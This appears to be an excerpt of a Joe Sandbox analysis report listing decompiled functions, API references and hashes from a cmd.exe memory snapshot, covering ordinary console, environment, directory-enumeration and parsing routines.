Part of subcall function 00D90178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00DA7EF1
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00DA7EFE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
String ID:
API String ID: 2847887402-0
Opcode ID: 8064dbe4a478f77cf6c9d7a2d0bc05c2a5a58ad7d7b455a87db97bfe1e48cbcc
Instruction ID: 345b47797ab6831985d92fbc450e0e6b63d45a33b0554cb38138e623618d9805
Opcode Fuzzy Hash: 8064dbe4a478f77cf6c9d7a2d0bc05c2a5a58ad7d7b455a87db97bfe1e48cbcc
Instruction Fuzzy Hash: BA211A3691424AAECB00EFF49C19AEEB7B8EF19711F10015AF915E3290EA309A408779

Uniqueness

Uniqueness Score: -1.00%

Function 00D946D8, Relevance: 7.6, APIs: 5, Instructions: 52
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D946D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0xdb3854 = _t3;
				if(GetCPInfo(_t3, 0xdb3840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0xdb3846 = 0xfe81;
						} else {
							 *0xdb3846 = 0;
						}
					} else {
						 *0xdb3846 = 0xfce09f81;
						 *0xdb384a = 0;
					}
				}
				_t7 = memset(0xdc7f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0xdb3846 != 0) {
					_t15 = 0xdb3846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0xdc7f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}

0x00d946d8
0x00d946e4
0x00d946f1
0x00d9e8be
0x00d9e8c7
0x00d9e8e5
0x00d9e8fb
0x00d9e8ed
0x00d9e8ed
0x00d9e8ed
0x00d9e8c9
0x00d9e8c9
0x00d9e8d3
0x00d9e8d3
0x00d9e8c7
0x00d94703
0x00d94708
0x00d94712
0x00d9e90b
0x00d9e910
0x00d9e910
0x00d9e915
0x00000000
0x00000000
0x00d9e917
0x00d9e91a
0x00d9e91f
0x00d9e92e
0x00d9e933
0x00d9e933
0x00d9e936
0x00d9e93c
0x00000000
0x00000000
0x00000000
0x00d9e93c
0x00d9e93f
0x00d94718
0x00d94718
0x00d94718

APIs

GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00D9458C), ref: 00D946D8
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00DB3840), ref: 00D946E9
memset.MSVCRT ref: 00D94703
GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00D9E8B8
memset.MSVCRT ref: 00D9E92E

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: memset$ConsoleInfoLocaleOutputThread
String ID:
API String ID: 1263632223-0
Opcode ID: dfbbee3a56871ccd19d8f0a9a381579f3159701dc09d1c05916f999591dee127
Instruction ID: 06334fda6bda4d124c157abc64ee29f696057d5bc320902dd6139403cea495ab
Opcode Fuzzy Hash: dfbbee3a56871ccd19d8f0a9a381579f3159701dc09d1c05916f999591dee127
Instruction Fuzzy Hash: D7116BB4E0C352F9DF309B149C0EBA07BC49B05F00F0C01A9F4C196692D2A94586A676

Uniqueness

Uniqueness Score: -1.00%

Function 00DA3BB0, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00DA3BB0(void* __eflags) {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* _t7;
				signed short _t13;
				signed int _t14;
				void* _t15;
				void* _t22;
				void* _t23;

				_push(_t15);
				_push(_t15);
				_t23 = GetStdHandle(0xfffffff6);
				_t7 = E00D8C108(_t15, 0x232b, 0, _t22);
				if(_t23 != 0) {
					if(E00D90178(_t7) == 0 || ( *0xdc3aa0 & 0x00000001) == 0) {
						E00DA3B11(_t23,  &_v8, 1,  &_v12);
					} else {
						_t13 = FlushConsoleInputBuffer(_t23);
						__imp___getch();
						_t14 = _t13 & 0x0000ffff;
						_v8 = _t14;
						if(_t14 == 3) {
							EnterCriticalSection( *0xdb3858);
							 *0xdad544 = 1;
							LeaveCriticalSection( *0xdb3858);
						}
					}
				}
				E00D925D9(L"\r\n");
				return 0;
			}

0x00da3bb5
0x00da3bb6
0x00da3bc7
0x00da3bc9
0x00da3bd2
0x00da3bdd
0x00da3c30
0x00da3be8
0x00da3be9
0x00da3bef
0x00da3bf5
0x00da3bf8
0x00da3bff
0x00da3c07
0x00da3c13
0x00da3c1d
0x00da3c1d
0x00da3bff
0x00da3bdd
0x00da3c3a
0x00da3c46

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,00D9997F,00000000,?,00DAA0FC,?,?,?), ref: 00DA3BBA

Part of subcall function 00D90178: _get_osfhandle.MSVCRT ref: 00D90183
Part of subcall function 00D90178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D9D6A1), ref: 00D9018D

FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,00D9997F,00000000,?,00DAA0FC,?,?,?), ref: 00DA3BE9
_getch.MSVCRT ref: 00DA3BEF
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D9997F,00000000,?,00DAA0FC,?,?,?), ref: 00DA3C07
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00D9997F,00000000,?,00DAA0FC,?,?,?), ref: 00DA3C1D

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
String ID:
API String ID: 491502236-0
Opcode ID: bee0ad61bf46fa475e048fce55e6aa6dddcd4af4fede1b70b7f7fa3327c5f288
Instruction ID: 8f43649d143226fd1d7062efb0f6bce238ce194971235af7f615f29a4b1df11f
Opcode Fuzzy Hash: bee0ad61bf46fa475e048fce55e6aa6dddcd4af4fede1b70b7f7fa3327c5f288
Instruction Fuzzy Hash: 57018832504356BFD714AB60EC1EEAABB5ADB01730F140255F802D22E0DB759A409771

Uniqueness

Uniqueness Score: -1.00%

Function 00D93AAE, Relevance: 7.5, APIs: 5, Instructions: 32
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D93AAE() {
				int _t9;
				void* _t12;
				WCHAR* _t13;

				_t13 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t13 != 0) {
					_t9 = E00D93B00(_t13);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t13, _t9);
					}
					FreeEnvironmentStringsW(_t13);
				}
				return _t12;
			}

0x00d93ab8
0x00d93aba
0x00d93abe
0x00d93ac8
0x00d93ada
0x00d93ade
0x00d93ae3
0x00d93ae8
0x00d93aec
0x00d93af2
0x00d93af7

APIs

GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,00D93A9F), ref: 00D93AB2
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 00D93ACD
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00D93AD4
memcpy.MSVCRT ref: 00D93AE3
FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 00D93AEC

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
String ID:
API String ID: 713576409-0
Opcode ID: 30ee37c1771f3a625e196c2a179bd3c956c263f966a6b6c5738e31297981f822
Instruction ID: a05d6d3c325814aa9aab1ee2a227518b73cbd5eeea0e8b2b35988afeac270acb
Opcode Fuzzy Hash: 30ee37c1771f3a625e196c2a179bd3c956c263f966a6b6c5738e31297981f822
Instruction Fuzzy Hash: E3E092B360071367CB1223296C5EDAFA95EDBC9B6170D0054F909C3300DE308D0641B1

Uniqueness

Uniqueness Score: -1.00%

Function 00D95266, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00D95266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
				void* _t224;
				void* _t225;
				intOrPtr _t227;
				intOrPtr _t231;

				_t195 = __edx;
				_v20 = __edx;
				_t168 = __ecx;
				_v28 = 0;
				_v16 = 0;
				_t227 =  *0xdad544; // 0x0
				if(_t227 != 0) {
					L47:
					return 1;
				}
				_t115 = _a12;
				_v8 = _t115;
				_t208 = _t115 >> 0x00000002 & 1;
				_t123 = E00D95590(__ecx, __edx, _a4, _a8, _t115 >> 0x00000002 & 1, _a16, _a20, _a24, _a28, _a32);
				if(_t123 == 0) {
					_v16 = 1;
					_t216 = _v8 & 0x00000001;
					L4:
					E00D90040( *((intOrPtr*)(_t168 + 0x18)));
					 *((intOrPtr*)(_t168 + 0x18)) = 0;
					_t231 =  *0xdad544; // 0x0
					if(_t231 != 0) {
						goto L47;
					}
					if(_t216 == 0) {
						return 0;
					}
					memset( &_v76, 0, 0x30);
					_t225 = _t224 + 0xc;
					_t129 = E00D9297B( *((intOrPtr*)(_t168 + 4)));
					_t172 = 0x10;
					_v72 = _t129;
					_t173 = E00D900B0(_t172);
					if(_t173 == 0) {
						L51:
						E00DA9287(_t173);
						__imp__longjmp(0xdbb8b8, 1);
						L52:
						_v56 = _t195;
						_t218 = _t195;
						L10:
						if( *0xdad544 != 0) {
							goto L47;
						}
						_v12 = _t195;
						if(_v56 <= 0) {
							L38:
							E00D90040(_v48);
							E00D90040(_v52);
							E00D90040(_v64[1]);
							E00D90040(_v64);
							E00D90040(_v72);
							if(_t218 != 0 || _v16 != _t218) {
								return _t218;
							} else {
								_push(2);
								L41:
								_pop(_t138);
								return _t138;
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t180 = ".";
							_t210 =  *((intOrPtr*)(_v48 + _v12 * 4));
							_t37 = _t210 + 0x30; // 0x30
							_t140 = _t37;
							_v24 = _t140;
							while(1) {
								_t196 =  *_t140;
								if(_t196 !=  *_t180) {
									break;
								}
								if(_t196 == 0) {
									L17:
									_t141 = 0;
									L18:
									if(_t141 == 0) {
										goto L37;
									}
									_t181 = L"..";
									_t41 = _t210 + 0x30; // 0x30
									_t144 = _t41;
									while(1) {
										_t197 =  *_t144;
										if(_t197 !=  *_t181) {
											break;
										}
										if(_t197 == 0) {
											L24:
											_t145 = 0;
											L25:
											if(_t145 == 0) {
												goto L37;
											}
											if((_v8 & 0x00000002) != 0 || ( *(_t210 + 4) & 0x00000400) == 0) {
												L28:
												_t198 =  *((intOrPtr*)(_t168 + 4));
												_t51 = _t198 + 2; // 0x402
												_t182 = _t51;
												do {
													_t146 =  *_t198;
													_t198 = _t198 + 2;
												} while (_t146 != 0);
												_t211 = _v24;
												_t183 = _t211;
												_t195 = _t198 - _t182 >> 1;
												_t220 = _t183 + 2;
												do {
													_t147 =  *_t183;
													_t183 = _t183 + 2;
												} while (_t147 != _v28);
												_t55 = _t195 + 2; // 0x400
												_t185 = _t183 - _t220 >> 1;
												_t222 = _t55 + (_t183 - _t220 >> 1);
												if(_t222 > 0x7fe7) {
													_push(_t211);
													E00D8C5A2(_t185, 0x400023d8, 2,  *((intOrPtr*)(_t168 + 4)));
													_push(0x6f);
													goto L41;
												}
												memset( &_v124, 0, 0x30);
												_t225 = _t225 + 0xc;
												_t173 = _t222 + _t222;
												_t152 = E00D900B0(_t222 + _t222);
												if(_t152 == 0) {
													goto L51;
												}
												_v120 = _t152;
												E00D951C9(_t152, _t222,  *((intOrPtr*)(_t168 + 4)), _t211);
												_v112 =  *((intOrPtr*)(_t168 + 0xc));
												_v116 =  *((intOrPtr*)(_t168 + 8));
												_v108 =  *((intOrPtr*)(_t168 + 0x10));
												_t218 = E00D95266( &_v124, _v20, _a4, _a8, _v8, _a16, _a20, _a24, _a28, _a32);
												E00D90040(_v100);
												_v100 = 0;
												E00D90040(_v96);
												_v96 = 0;
												E00D90040(_v120);
												_v120 = 0;
												if(_t218 == 0) {
													_v16 = 1;
													goto L37;
												}
												if(_t218 != 2) {
													if(_t218 != 0x6f && _t218 != 3) {
														_t162 =  *((intOrPtr*)(_v48 + _v12 * 4));
														if(( *(_t162 + 4) & 0x00000400) == 0) {
															goto L38;
														}
														if(( *(_t162 + 0x28) & 0x20000000) != 0) {
															goto L36;
														}
														if( *(_t162 + 0x28) != 0x8000000a) {
															goto L38;
														}
													}
												}
												L36:
												_t218 = 0;
												goto L37;
											} else {
												if(( *(_t210 + 0x28) & 0x20000000) != 0 ||  *(_t210 + 0x28) == 0x8000000a) {
													goto L37;
												} else {
													goto L28;
												}
											}
										}
										_t203 =  *((intOrPtr*)(_t144 + 2));
										_t43 =  &(_t181[2]); // 0x2e
										if(_t203 !=  *_t43) {
											break;
										}
										_t144 = _t144 + 4;
										_t181 =  &(_t181[4]);
										if(_t203 != 0) {
											continue;
										}
										goto L24;
									}
									asm("sbb eax, eax");
									_t145 = _t144 | 0x00000001;
									goto L25;
								}
								_t204 =  *((intOrPtr*)(_t140 + 2));
								_t40 =  &(_t180[2]); // 0x200000
								if(_t204 !=  *_t40) {
									break;
								}
								_t140 = _t140 + 4;
								_t180 =  &(_t180[4]);
								if(_t204 != 0) {
									continue;
								}
								goto L17;
							}
							asm("sbb eax, eax");
							_t141 = _t140 | 0x00000001;
							goto L18;
							L37:
							_t143 = _v12 + 1;
							_v12 = _t143;
						} while (_t143 < _v56);
						goto L38;
					}
					_t163 =  *((intOrPtr*)(_t168 + 0x10));
					_v60 = _t163;
					_v64 = _t173;
					_t164 = L"*.*";
					_v68 = 1;
					_v76 = 0;
					if(_t163 == 0) {
						_t164 = "*";
					}
					 *_t173 = _t164;
					_v64[1] = E00D9297B(_v72);
					_v64[3] = 0;
					_t218 = E00D95590( &_v76, _v20, 0x10, 0x10, _t208, 0, 0, 0, 0, 0);
					_t195 = 0;
					if(_t218 != 0) {
						goto L52;
					} else {
						goto L10;
					}
				}
				if(_t123 != 2) {
					if(_t123 == 3) {
						goto L3;
					}
				} else {
					L3:
					_t216 = _v8 & 0x00000001;
					if(_t216 != 0) {
						goto L4;
					}
				}
				return _t123;
			}

0x00d95266
0x00d95271
0x00d95274
0x00d95276
0x00d9527b
0x00d9527e
0x00d95284
0x00d95587
0x00000000
0x00d95589
0x00d9528a
0x00d95291
0x00d952af
0x00d952b7
0x00d952be
0x00d95561
0x00d95567
0x00d952d9
0x00d952dc
0x00d952e3
0x00d952e6
0x00d952ec
0x00000000
0x00000000
0x00d952f4
0x00000000
0x00d9556f
0x00d95303
0x00d9530b
0x00d9530e
0x00d95315
0x00d95316
0x00d9531e
0x00d95322
0x00d9f105
0x00d9f105
0x00d9f111
0x00d9f117
0x00d9f117
0x00d9f11a
0x00d95380
0x00d95387
0x00000000
0x00000000
0x00d95391
0x00d95394
0x00d95521
0x00d95524
0x00d9552c
0x00d95537
0x00d9553f
0x00d95547
0x00d9554e
0x00000000
0x00d95555
0x00d95555
0x00d95557
0x00d95557
0x00000000
0x00d95557
0x00000000
0x00000000
0x00000000
0x00d9539a
0x00d9539a
0x00d9539d
0x00d953a5
0x00d953a8
0x00d953a8
0x00d953ab
0x00d953ae
0x00d953ae
0x00d953b4
0x00000000
0x00000000
0x00d953bd
0x00d953d8
0x00d953d8
0x00d953da
0x00d953dc
0x00000000
0x00000000
0x00d953e2
0x00d953e7
0x00d953e7
0x00d953ea
0x00d953ea
0x00d953f0
0x00000000
0x00000000
0x00d953f9
0x00d95414
0x00d95414
0x00d95416
0x00d95418
0x00000000
0x00000000
0x00d95422
0x00d95431
0x00d95431
0x00d95436
0x00d95436
0x00d95439
0x00d95439
0x00d9543c
0x00d9543f
0x00d95444
0x00d95449
0x00d9544b
0x00d9544d
0x00d95450
0x00d95450
0x00d95453
0x00d95456
0x00d9545e
0x00d95461
0x00d95463
0x00d9546b
0x00d9f193
0x00d9f19e
0x00d9f1a6
0x00000000
0x00d9f1a6
0x00d9547a
0x00d9547f
0x00d95482
0x00d95485
0x00d9548c
0x00000000
0x00000000
0x00d95498
0x00d9549d
0x00d954b4
0x00d954c0
0x00d954cc
0x00d954da
0x00d954dc
0x00d954e6
0x00d954e9
0x00d954f1
0x00d954f4
0x00d954fb
0x00d95500
0x00d9f140
0x00000000
0x00d9f140
0x00d95509
0x00d9f14f
0x00d9f164
0x00d9f16e
0x00000000
0x00000000
0x00d9f17b
0x00000000
0x00000000
0x00d9f188
0x00000000
0x00000000
0x00d9f18e
0x00d9f14f
0x00d9550f
0x00d9550f
0x00000000
0x00d9f121
0x00d9f128
0x00000000
0x00d9f13b
0x00000000
0x00d9f13b
0x00d9f128
0x00d95422
0x00d953fb
0x00d953ff
0x00d95403
0x00000000
0x00000000
0x00d95409
0x00d9540c
0x00d95412
0x00000000
0x00000000
0x00000000
0x00d95412
0x00d9557d
0x00d9557f
0x00000000
0x00d9557f
0x00d953bf
0x00d953c3
0x00d953c7
0x00000000
0x00000000
0x00d953cd
0x00d953d0
0x00d953d6
0x00000000
0x00000000
0x00000000
0x00d953d6
0x00d95573
0x00d95575
0x00000000
0x00d95511
0x00d95514
0x00d95515
0x00d95518
0x00000000
0x00d9539a
0x00d95328
0x00d9532b
0x00d95330
0x00d95333
0x00d95338
0x00d9533f
0x00d95342
0x00d95344
0x00d95344
0x00d95349
0x00d9535e
0x00d9536c
0x00d95374
0x00d95376
0x00d9537a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d9537a
0x00d952c7
0x00d9f0fa
0x00000000
0x00d9f100
0x00d952cd
0x00d952cd
0x00d952d0
0x00d952d3
0x00000000
0x00000000
0x00d952d3
0x00d9555e

APIs

Part of subcall function 00D95590: memset.MSVCRT ref: 00D95614

Part of subcall function 00D90040: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00000000,00D936B3,00D93691,00000000), ref: 00D90078
Part of subcall function 00D90040: RtlFreeHeap.NTDLL(00000000), ref: 00D9007F

memset.MSVCRT ref: 00D95303

Part of subcall function 00D900B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000), ref: 00D900C1
Part of subcall function 00D900B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8DF68,00000001,?,00000000,00D93458,-00000105,00DABDD8,00000240,00D94B82,00000000,00000000,00D9AE6E,00000000,?), ref: 00D900C8

memset.MSVCRT ref: 00D9547A
longjmp.MSVCRT(00DBB8B8,00000001,?,?,?), ref: 00D9F111

Strings

*.*, xrefs: 00D95333

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$memset$Process$AllocFreelongjmp
String ID: *.*
API String ID: 539101449-438819550
Opcode ID: 008acb7ffa210b96e3292d0c5e124bf9347e846957568c7054e29b1e54275a1d
Instruction ID: 5f2b3019e1c5a4fc557c57436f737ceb28408a2ebe7927987b50e47c4f060d55
Opcode Fuzzy Hash: 008acb7ffa210b96e3292d0c5e124bf9347e846957568c7054e29b1e54275a1d
Instruction Fuzzy Hash: 15B1BE71D006059FCF26DFA4E841AAEBBB6EF54310F194179E809AB25AE731DD41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D8F090, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00D8F090(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t17;
				intOrPtr _t19;
				signed int _t26;
				signed int _t27;
				signed int _t28;
				intOrPtr _t37;
				signed int _t40;
				signed int _t41;
				void* _t43;
				intOrPtr _t46;
				intOrPtr* _t51;
				intOrPtr _t59;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				intOrPtr* _t74;
				signed int _t75;
				void* _t76;
				intOrPtr _t83;

				_t66 = __edx;
				_t17 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t17 ^ _t75;
				_t73 = _a8;
				_v12 = __edx;
				_t70 = __ecx;
				if(_t73 == E00D90210) {
					_t19 = E00D90210(__ecx, __edx);
				} else {
					if(_t73 == E00D90480) {
						_t19 = E00D90480();
					} else {
						if(_t73 == E00D90600) {
							_t19 = E00D90600();
						} else {
							if(_t73 != E00D90620) {
								 *0xdc94b4();
								_t19 =  *_t73();
							} else {
								_t19 = E00D90620();
							}
						}
					}
				}
				_t46 = _t19;
				if( *((short*)( *0xdbb8a4)) == 0) {
					L21:
					return E00D96FD0(_t46, _t46, _v8 ^ _t75, _t66, _t70, _t73);
				} else {
					_t83 =  *0xdad554; // 0x0
					if(_t83 != 0) {
					}
					_t68 = E00D8F300(0x10, 0xdbfaa0, 0x2000, 0x10);
					 *0xdbfa90 = _t68;
					if(_t68 == 0xffffffff) {
						 *0xdbf980 = 0x234a;
						__imp__longjmp(0xdbb940, 1);
						goto L49;
					} else {
						_t62 = 0xdbfaa0;
						_t4 = _t62 + 2; // 0xdbfaa2
						_t73 = _t4;
						do {
							_t43 =  *_t62;
							_t62 = _t62 + 2;
						} while (_t43 != 0);
						_t5 = (_t62 - _t73 >> 1) + 1; // 0xdbfa9f
						 *0xdbfa8c = _t5;
						if( *0xdbf984 != 0) {
							L49:
							_push(0xdbfaa0);
							_push(_t68);
							E00D925D9(L"GeToken: (%x) \'%s\'\n");
							_t76 = _t76 + 0xc;
						}
					}
					_t26 = 0xdbfaa0;
					_t51 = _t70;
					while(1) {
						_t69 =  *_t51;
						if(_t69 !=  *_t26) {
							break;
						}
						if(_t69 == 0) {
							L17:
							_t27 = 0;
						} else {
							_t6 = _t51 + 2; // 0x2b0000
							_t66 =  *_t6;
							if(_t66 !=  *((intOrPtr*)(_t26 + 2))) {
								break;
							} else {
								_t51 = _t51 + 4;
								_t26 = _t26 + 4;
								if(_t66 != 0) {
									continue;
								} else {
									goto L17;
								}
							}
						}
						L18:
						if(_t27 == 0) {
							if( *0xdbfaa0 == 0xa) {
								goto L34;
							} else {
								_t71 = _v12;
								goto L37;
							}
						} else {
							_t40 =  *0xdad558; // 0x0
							if( *((char*)(_t40 + 0xdbf987)) == 0x33) {
								_t41 = "&";
								while(1) {
									_t59 =  *_t70;
									if(_t59 !=  *_t41) {
										break;
									}
									if(_t59 == 0) {
										L30:
										_t40 = 0;
									} else {
										_t10 = _t70 + 2; // 0x2b0000
										_t61 =  *_t10;
										_t11 = _t41 + 2; // 0x2b0000
										if(_t61 !=  *_t11) {
											break;
										} else {
											_t70 = _t70 + 4;
											_t41 = _t41 + 4;
											if(_t61 != 0) {
												continue;
											} else {
												goto L30;
											}
										}
									}
									L31:
									if(_t40 != 0 ||  *0xdbfaa0 != 0xa) {
										goto L20;
									} else {
										do {
											L34:
											_t28 = E00D8F030(0);
										} while ( *0xdbfaa0 == 0xa);
										_t66 = 0;
										E00D8F300(_t28, 0, 0, 0);
										if( *0xdbfaa0 == 0x29) {
											goto L21;
										} else {
											_t71 = 0x2e;
											L37:
											_t74 = E00D900B0(0x50);
											if(_t74 == 0) {
												E00DA9287(0x50);
												__imp__longjmp(0xdbb8b8, 1);
												asm("int3");
												_push( *0xdbb8a0);
												E00D925D9(L"Ungetting: \'%s\'\n");
												 *0xdbb8a4 =  *0xdbb8a0;
												return 0;
											} else {
												 *_t74 = _t71;
												 *((intOrPtr*)(_t74 + 0x38)) = _t46;
												 *0xdad548 = 1;
												E00D8F030(8);
												_t72 = _a4;
												 *0xdad548 = 0;
												if(_t72 != E00D8E8C0) {
													 *0xdc94b4();
													_t37 =  *_t72();
												} else {
													_t37 = E00D8E8C0();
												}
												 *((intOrPtr*)(_t74 + 0x3c)) = _t37;
												return E00D96FD0(_t74, _t46, _v8 ^ _t75, _t66, _t72, _t74);
											}
										}
									}
									goto L52;
								}
								asm("sbb eax, eax");
								_t40 = _t41 | 0x00000001;
								goto L31;
							} else {
								L20:
								_t66 = 0;
								E00D8F300(_t40, 0, 0, 0);
								goto L21;
							}
						}
						goto L52;
					}
					asm("sbb eax, eax");
					_t27 = _t26 | 0x00000001;
					goto L18;
				}
				L52:
			}

0x00d8f090
0x00d8f098
0x00d8f09f
0x00d8f0a4
0x00d8f0a7
0x00d8f0ab
0x00d8f0b3
0x00d8f0e0
0x00d8f0b5
0x00d8f0bb
0x00d8f1c2
0x00d8f0c1
0x00d8f0c7
0x00d8f1cc
0x00d8f0cd
0x00d8f0d3
0x00d9c48d
0x00d9c493
0x00d8f0d9
0x00d8f0d9
0x00d8f0d9
0x00d8f0d3
0x00d8f0c7
0x00d8f0bb
0x00d8f0e5
0x00d8f0f0
0x00d8f1ad
0x00d8f1bf
0x00d8f0f6
0x00d8f0f8
0x00d8f0fe
0x00d8f1d6
0x00d8f114
0x00d8f116
0x00d8f11f
0x00d9c4a1
0x00d9c4ab
0x00000000
0x00d8f125
0x00d8f125
0x00d8f12a
0x00d8f12a
0x00d8f130
0x00d8f130
0x00d8f133
0x00d8f136
0x00d8f146
0x00d8f149
0x00d8f14e
0x00d9c4b1
0x00d9c4b1
0x00d9c4b6
0x00d9c4bc
0x00d9c4c1
0x00d9c4c1
0x00d8f14e
0x00d8f154
0x00d8f159
0x00d8f160
0x00d8f160
0x00d8f166
0x00000000
0x00000000
0x00d8f16f
0x00d8f18a
0x00d8f18a
0x00d8f171
0x00d8f171
0x00d8f171
0x00d8f179
0x00000000
0x00d8f17f
0x00d8f17f
0x00d8f182
0x00d8f188
0x00000000
0x00000000
0x00000000
0x00000000
0x00d8f188
0x00d8f179
0x00d8f18c
0x00d8f18e
0x00d8f2da
0x00000000
0x00d8f2e0
0x00d8f2e0
0x00000000
0x00d8f2e0
0x00d8f194
0x00d8f194
0x00d8f1a0
0x00d8f1e0
0x00d8f1f0
0x00d8f1f0
0x00d8f1f6
